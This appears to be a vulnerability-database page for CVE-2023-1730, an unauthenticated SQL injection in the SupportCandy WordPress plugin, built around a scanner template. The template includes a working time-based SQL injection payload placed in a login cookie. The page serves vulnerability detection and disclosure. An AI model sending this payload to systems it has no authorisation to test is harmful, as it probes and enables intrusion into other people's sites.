CVE-2023-1730: SupportCandy < 3.1.5 - Unauthenticated SQL Injection

2025-08-01 SupportCandy PoC Public

Description

The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks.

PoC

id: CVE-2023-1730

info:
  name: SupportCandy < 3.1.5 - Unauthenticated SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: Fixed in version 3.1.5
  reference:
    - https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7
    - https://wordpress.org/plugins/supportcandy/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1730
    - https://github.com/tanjiti/sec_profile
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-1730
    cwe-id: CWE-89
    epss-score: 0.40586
    epss-percentile: 0.98577
    cpe: cpe:2.3:a:supportcandy:supportcandy:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: supportcandy
    product: supportcandy
    framework: wordpress
  tags: time-based-sqli,cve2023,cve,sqli,wpscan,wordpress,supportcandy,unauth,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cookie: wpsc_guest_login_auth={"email":"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu"}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(body, "supportcandy")'
        condition: and
# digest: 4a0a0047304502205cb5665523f493439fb6c2680622748099435de971588b95616f3801a3e34c6a0221008805e2dc38ef2b1e5ae3d51651b5e7f6c50dc33f99e7a40796793a75ec985af4:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities